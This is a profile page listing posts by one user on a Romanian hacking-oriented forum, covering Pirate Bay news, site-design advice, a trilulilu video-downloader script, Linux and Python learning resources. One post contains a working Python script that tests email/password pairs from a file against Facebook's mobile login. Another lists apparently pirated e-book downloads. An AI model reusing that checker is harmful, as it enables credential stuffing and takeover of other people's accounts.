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Everything posted by sharkyz

  1. https://www.youtube.com/watch?v=spZJrsssPA0 NVIDIA GeForce GTX 970 memory issue to be fixed with new driver update | Christian News on Christian Today
  2. Nu stiu daca mai exista staff sa lucreze la platforma...
  3. Am zis sa ma uit din nou prin sursa la https://thepiratebay.se/ si ce sa vad, este (aproape) functional sau mi se pare? In momentul de fata cred ca au o problema cu baza de date! Img1: [U]http://i.imgur.com/9L7eE5y.png[/U] Img2: [U]http://i.imgur.com/N1aS4gZ.png[/U] Img3: [U]http://i.imgur.com/kiWvLN3.png [/U] News: [U]http://www.ibtimes.co.uk/pirate-bay-relaunch[/U] [U]-will-expose-users-serious-security-risks-1485961 [/U] [U]http://torrentfreak.com/pirate-bay-wont-make-a-full-comeback-staff-revolt-150127/ [/U] [U]http://www.techworm.net/2015/01/mutiny-of-the-pirate-bay-crew-key-admins-mods-abandon-ship.html [/U] [U]http://www.independent.co.uk/life-style/gadgets-and-tech/news/pirate-bay-is-returning-this-weekend-but-trimmed-down-version-creates-rift-between-staff-10008371.html [/U]http://torrentfreak.com/pirate-bay-back-online-150131/ (Probably a new torrent tracker with the old piratebay crew is on the way)
  4. Am schimbat link-ul, poti sa te uiti la Alfa AWUS036NHV 5000mW, cea ce ma intereseaza este daca suporta monitor mode si injectarea de pachete. As vrea o antena long range bgn pentru testarea routerelor. (in scopuri educationale, of course)
  5. sharkyz


    1. Tem? este prea înc?rcat?, prea mult spa?iu între elemente, prea multe p?trate care nu î?i au folosul. 2. Chiar ai nevoie de sidebar? Ocup? prea mult spa?iu ?i tot ce e acolo poate fi aranjat mult mai frumos în pagin?. 3. Headerul cu acea imagine ce folos are? Din nou, ocup? mult spa?iu, remove! 4. Prea multe elemente mi?c?toare. Recomandare: Schimb? tem?! Ai nevoie de ceva cur??, simplu, în care textul are prioritate. Gandeste din perspectiva unui visitator: Cand intri pe o pagina cum alegi articolul care vrei sa il citesti? - Eu ma uit la imagine si apoi la titlu, apoi click daca imi place, next daca nu. - Cu cati mai putin spatiu intre linkul si imaginea catre articole cu atat trec cu ochiul prin mai multe articole fara scroll ca sa aleg cea ce vreau sa citesc. La ce te astepti de la pagina unui articol? - Fara elemente de distragere (moving text) - Sa se incarce cat mai repede. (Mai putin html,mai putine elemente, mai mult text) In fine te-ai prins, puteti intrebari de genu. Cateva sugestii pentru teme: Asemanator: http://thenextweb.com/ (i lovit) http://venturebeat.com/ http://envirra.com/themes/neue/ (Imi place partea de sus, titlu boldat) http://www.makeuseof.com/ (Nu prea este nevoie de descriere, si titlu ar putea fii peste imagini. http://arstechnica.com/ (titlu boldat) http://themeforest.net/item/entrance-wordpress-theme-for-magazine-and-review/full_screen_preview/6815286 #Diacritice adaugate cu diacritice (dot) com
  6. Am reusit sa fac un mic program in python care sa descarce video dupa trilulilu. Nu este nici pe aproape optimizat, inca vreau sa mai adaug multe lucruri. Sursa pentru cine vrea sa ajute. https://github.com/samanx/trilulilu-downloader '#!/usr/bin/env python# -*- coding: utf-8 -*-''' Python Trilulilu Downloader Support for Video and Audio Support for online view Author: sharkyz of rstforums.com ''' import re from requests_futures .sessions import FuturesSession from concurrent.futures import ThreadPoolExecutor from bs4 import BeautifulSoup import time import lxml import sys #, os url = 'http://www.trilulilu.ro/pisica-asta-chiar-isi-doreste-sa-vorbeasca' class commands(object): def __init__(self, httpadress): self.httpadress = httpadress #@profile # Used for profiling the app line by line // Ignore def main_function(self): # Acess, Find, Rewrite, Download session = FuturesSession(executor=ThreadPoolExecutor(max_workers=16)) page = session.get(self.httpadress) page_result = page.result() page_result.encoding = 'utf-8' soup = BeautifulSoup(page_result.text, 'lxml') locatescript = soup.find(text=re.compile('swfobject.embedSWF')) keys = re.findall(r'"([^,]*?)":', locatescript) values = re.findall(r'(?<(?:"(.*?)"|\d+)', locatescript) vovu = dict(zip(keys, values)) video_test = {'videosrc_0':'http://fs{servers}.trilulilu.ro/stream.php?type=video&' 'source=site&hash={hashs}&username={userids}&key={keys}' '&format=flv-vp6&sig=&exp='.format(servers=vovu['server'], hashs=vovu['hash'], userids=vovu['userid'], keys=vovu['key']), 'videosrc_1':'http://fs{servers}.trilulilu.ro/stream.php?type=video&' 'source=site&hash={hashs}&username={userids}&key={keys}' '&format=mp4-360p&sig=&exp='.format(servers=vovu['server'], hashs=vovu['hash'], userids=vovu['userid'], keys=vovu['key'])} # Name the file page_title = soup.title.string # Title of trilulilu page title_chooser = page_title.split(' - ') # Split the title wherever '-' and create a list with elements # Search for the right file to download & Download it for link in video_test: respond = session.get(video_test[link], stream=True) file_size = int(respond.result().headers.get('Content-Length', 0)) if file_size > 1048576: # Check if the link was the mp4 or the flv format and choose name if 'mp4' in video_test[link]: local_name_file = '{} - {}.mp4'.format(title_chooser[0],title_chooser[1]) elif 'flv' in video_test[link]: local_name_file = '{} - {}.flv'.format(title_chooser[0],title_chooser[1]) else: print('Download stopped, not recognizable format!') with open(local_name_file, 'wb') as f: dl = 0 count = 0 start_time_local = time.mktime(time.localtime()) # Writing file for chunk in respond.result().iter_content(chunk_size=32 * 1024): if chunk: count += 1 dl += len(chunk) f.write(chunk) end_time_local = time.mktime(time.localtime()) f.flush() #Configuring Progressbar if end_time_local > start_time_local: dl_speed = round((dl / (end_time_local - start_time_local)) / 1000, 2) sys.stdout.flush() #print('Downloading now...\nFile:{}\nSize:{}M'.format(local_name_file, round(file_size / 1000/ 1000, 2))) percent_text = round(dl * 100 / file_size) percent_text4 = round(percent_text/4) #print(percent_text4) #teleies1='.' * x #asterisks1='*' * int(i/2) i = round(percent_text4) x = 12 - i z = 25 - i def asterisks0(): if percent_text <= 50: return '#' * int(i) else: return '#' * 12 def teleies0(): if percent_text < 10: return '-' * int(x + 1) elif percent_text <= 50: return '-' * int(x) else: return '' def asterisks1(): if percent_text > 50: str_asterisk1 = '#' * (i - 12) return '#' * (i - 12) else: return '' def teleies1(): if percent_text > 50: return '-' * z else: return '-' * 12 # Progressbar printing sys.stdout.write('[{}{}{}%{}{}] [ Speed: {}Kbps ] \r'.format(asterisks0(),teleies0(),percent_text,asterisks1(),teleies1(),dl_speed)) sys.stdout.flush() start = commands(url).main_function() start [ Coming ] * Asyncio pentru request si pentru download # Mai rapid /Done * Progress bar pentru descarcare # Mai frumos, /Done (I want something better) * Concurrent download threads # Faster /In progress * Watch as you download # Mai util * mp3 converter Si cam atat am in minte sa fac pana maine! Ideine si contributiile sunt bine venite. [ Bugs ] * Nu se pot descarca videouri mai mici de 1mb decat daca schimbati if file_size > 1048576: cu ceva mai mic. 1048576 sunt bits. EDIT[2]: De data asta programul este compatibil si cu windows, linux si mac, sper. EDIT[1]: Acum merge numai ca trebuie sa introduci link-ul manual EDIT[0]: Am observat ca nu merge pe toate videourile, pe majoritatea, asa ca voi reveni cu un update mai tarziu.
  7. Salut, 1.Stie cineva cum pot crypta si decrypta un fisier cu PGP in python si sa imi explice aproximativ cum lucreaza PGP. // Am inteles ca sunt doua cheii, una random si una aleasa dar encrypted. Defapt nu am prea inteles, cu cat citesc mai mult cu atat ma incurc si mai mult. 0 2.Ar fi PGP o alegere buna pentru a tine niste fisiere cryptate in cloud fara frica?
  8. A mers din prima fara vpn. Thanks, nu ca imi foloseste la ceva, totusi macar scap de publicitati.
  9. Am incercat sa fac un verificator asemanator in python bazat pe codul lu zatarra dar nu sunt sigur cum sa salvez cookie-urile. #!/usr/bin/env python3 import http.cookiejar from urllib import request, parse,error def trythis(email,password): jar = http.cookiejar.CookieJar() cookie = request.HTTPCookieProcessor(jar) opener = request.build_opener(cookie) headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0", "Accept" : "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,text/png,*/*;q=0.5", "Accept-Language" : "en-us,en;q=0.5", "Accept-Charset" : "ISO-8859-1", "Content-type": "application/x-www-form-urlencoded", "Host": "m.facebook.com" } url = 'https://m.facebook.com/login.php' data = parse.urlencode({'email':email,'pass':password,'login':'Enter'}) binary_data = data.encode() req = request.Request(url,binary_data,headers) res = opener.open(req) html = res.read() if 'Logout' in html.decode('utf-8'): print('%s:%s OK' % (email,password)) else: print('%s:%s BAD' % (email,password)) def verify(usrfile = 'users.txt'): userlist_file = open(usrfile,'r+') for i in userlist_file.readlines(): fb = i.strip(' ').split(' ') trythis(fb[0],fb[1]) verify() Any ideas?
  10. https://www.google.com/calendar/
  11. Pentru un utilizator normal i-as da dreptate lui AlMalalah dar nu prea sunt sigur ca rst este un forum pentru utlizatorii normalii ai pc-ului ci putin mai advanced shit. Si mie unul chiar imi place sa tinkeresc prin linux si sa invat despre cum merge, si sa spun adevarul nici acum nu il inteleg in 'totalitate' adica nici 20%. @Stfean_Iordache: scmnts, u must be very limited...
  12. O sa fac o mica schimbare la lista lui Birkof daca nu se supara. Putem adauga inainte de php sau alternativa la php, python + django. Python iti va ajuta foarte mult in general ca limbaj de programare nu numai pentru web development.
  13. Arch Linux Desi pierzi foarte mult timp la instalare si la intregul "look" in final va fi pe placul tau. Inainte foloseam Elementary OS, Linux Mint si Debian si nu am avut nici o problema, dar cu Arch chiar simti ca este altau plus ca am ajuns sa iubesc faptul ca este Rolling Release si package managerul (Se simte si chiar cred ca este mult mai rapid) + yaourt!
  14. Si daca va enervati ca multi dintre ei(.darky) si-au sters posturile aveti: Pagina: 1, 2, 3, 4, 5, 6, 7 //Pur si simplu nu suport sa mi se ascunda lucruri.
  15. Iti propun amani pentru putin si sa stai sa inveti mai bine html/css, div-urile nu sunt singura problema care le face photoshop. O applicatie de acest fel ar putea avea un usebase mare daca este bine facuta, mai ai mult de munca la ea si nici nu te gandi la lansare intr-o luna-doua.
  16. Cum vi se pare acest software pentru un forum? Github: https://github.com/rafalp/Misago Demo si Community: Welcome to Misago Project Forums Inca este destul de mic proiectul dar mi se pare ca are un viitor stralucit, si in curand as vrea sa il implementez intr-un forum pentru un prieten vi se pare o idee buna? Edit: Am mai gasit inca un forum software facut in nodejs [Demo] dar probabil voi merge pe Misago, LOVE FOR PYTHON!
  17. Da se poate, nu prea este domeniul meu dar cred ca pot crea o lista, desi ar fi mai bine sa fie facuta de cineva care stie sau invata java.
  18. Link for non-registered users: http://goo.gl/l80Ibl For you who are eager to learn Python I will try to make a complete list of learning resources for this language. This list can and will include: Books, Videos, Tutorials and Websites which will help you learn python from beginner to advance to expert. Whenever you encounter a problem or get stuck with any of the material below I recomend you visit Our Documentation | Python.org E-Books in English: Programming Python, 4th Edition - Powerful Object-Oriented Programming, 4th Edition (2010).pdf 30.6 MB [ Download ] [ New] Python for Secret Agents (2014).pdf 1.4 MB [ Download ] [ New] Learning Python 5th Edition (2013).pdf 14.5 MB [ Download ] Programming in Python 3 - A Complete Introduction to the Python Language, 2nd Edition (2010).pdf 2.5 MB [ Download ] Python Algorithms: Mastering Basic Algorithms in the Python Language, 2nd Edition (2014).pdf 4.7 MB [ Download ] [ New] Python Algorithms: Mastering Basic Algorithms in the Python Language, 1st Edition (2010).pdf 4.9 MB [ Download ] [ New] Python Cookbook 3rd Edition - Recipes for Mastering Python 3 (2013).pdf 9.8 MB [ Download ] Learn Raspberry Pi - Programming with Python (2014).pdf 12.5 MB [ Download ] [ New] Expert Python Programming (2008).pdf 10.2 MB [ Download ] Foundations of Python Network Programming, Second Edition (2010).pdf 3.2 MB [ Download ] Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers & Security Engineers.pdf 7.8 MB [ Download ] Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009).pdf 3.0 MB [ Download ] Natural Language Processing with Python (2009).pdf 3.1 MB [ Download ] Dive into Python 3 (2009).pdf 2.5 MB [ Download ] Professional Python Frameworks - Web 2.0 Programming with Django and TurboGears (2007).pdf 10.3 MB [ Download ] Python.Web.Development.with.Django.pdf 4.3 MB [ Download ] Mobile Python - Rapid Prototyping of Applications on the Mobile Platform (2007).pdf 3.0 MB [ Download ] Beginning Python - Using Python 2.6 and Python 3.1 (2010).pdf 5.8 MB [ Download ] [ New] Python - Create - Modify - Reuse (2008).pdf 6.9 MB (This is quite old: Python 2.5.1, not so recommended) [ Download ] [ New] Python and AWS Cookbook - Managing Your Cloud with Python and Boto (2011).pdf 3.69 MB [ Download ] [ New] Videos in English: Google Python Class Day 1 Part 1 Google Python Class Day 1 Part 2 Google Python Class Day 1 Part 3 Google Python Class Day 2 Part 1 Google Python Class Day 2 Part 2 Google Python Class Day 2 Part 3 Google Python Class Day 2 Part 4 How to Install & Config Python Programming Environment Python (all parts in one) Learn Python Through Public Data Hacking -- Resources Python 3 Metaprogramming Python Web Development: Undestanding Django for Beginners How to Speed up a Python Program 114,000 times. A Billion Rows per Second: Metaprogramming Python for Big Data Prediction using Python -- Slides Developing Web Apps Using the Python Pyramid Framework Tutorial scikit-learn - Machine Learning in PythonImage Processing in Python with Scikits-Image Python Packaging HTML5 and Javascript Program as Standalone Program - Desktop GTK -- Source Code Python Encryption Tutorial with PyCrypto Websites in English: Python Official Documentation Google's Python Class Learn Python The Hard Way, 3rd Edition - [ PDF ] http://www.checkio.org/ - Interactive learning resource [ New] http://www.swaroopch.com/notes/python/ - If you would like to make a pdf out of this then: 'CTRL + P' and save as pdf. [ New] The Django Book Getting Started with Django - Video Based Lessons http://openbookproject.net/thinkcs/python/english3e/ [ New] Blender/Python Tutorials Online Python Tutor- Source Code Dive Into Python Try Python: Interactive - Attention: Doesn't work without silverlight LearnPython.org Interactive Python Tutorial Learn Python while working on projects http://interactivepython.org/ [ New] Also a bonus for registered users: https://rstforums.com/forum/89509-free-python-ebooks.rst Ce nu as da ca sa pot absorvi toate informatiile astea mai repede! Daca aveti resurse pe tema python le puteti lasa in commenturi si le voi adauga in post.
  19. Ma sperii ca nimeni pana acum nu a zis cuvant de programare, poate il prinde microbul. Daca faci un site cu scopul de a face bani niciodata nu vei face bani. Cand te gandesti ce fel de site sa faci, gandestete cum poti ajuta utilizatorii internetului, de ce au iei nevoie, exista un serviciu care este destul de popular dar nu a atins potentialul lui maxim, sau crezi ca poti face unul mai bun? Creaza unul asemanator + ceea ce are nevoie. Twitter Founder Reveals Secret Formula for Getting Rich Online | Wired Business | Wired.com Asta este pentru toti cei care vor sa faca bani online. Nu este usor dar cu ambitie, pasiune si persisten?? toate pot fi facute. Dar nu cautati metode usoare de a face bani, chiar daca gasiti nu vor tine pentru totdeauna, dar daca puneti o baza solida veti face bani.
  20. In Spain, website owners can now get six years in prison for linking to copyrighted material Website owners whose sites profit from linking to unauthorized copyrighted material can now be jailed for up to six years under a new measure that passed today in Spain. Spain is considered one of the worst offenders in Europe when it comes to illegally downloading content; one study reported that 98.7 of music Spaniards listen to is pirated. The law will spare peer-to-peer filesharing sites, search engines, and users of the link-sharing sites. SPAIN ENACTED THE LAW IN RESPONSE TO THE US The country enacted the law as a response to pressure from the US, where ironically the law is not as strict. Spain is in danger of being added to a list of countries that Washington considers to be the most egregious violators of copyright law, meaning it could be subject to trade sanctions from the US. Considering that Spain has just started recovering from the deep recession that began in 2008, it makes sense that citizens are downloading their music and movies instead of paying for it. But for the same reason, the Spanish government desperately wants to avoid angering one of its best customers. Source: theverge.com
  21. Scuze, am facut o cautare cu phoneblocks si nu a aparut nimic.
  22. Support IT & Phonebloks - Made by Dave Hakkens
  23. Nu sunt un fan apple si niciodata nu am vazut un avantaj la vrunul dintre produsele ei fata de competitie dar iPhone 5S chiar arata bine pe parte de estetica, nu vad prea multe schimbari in afara de butonul home si iconite dar iconitele arata bine pe telefon, nu?
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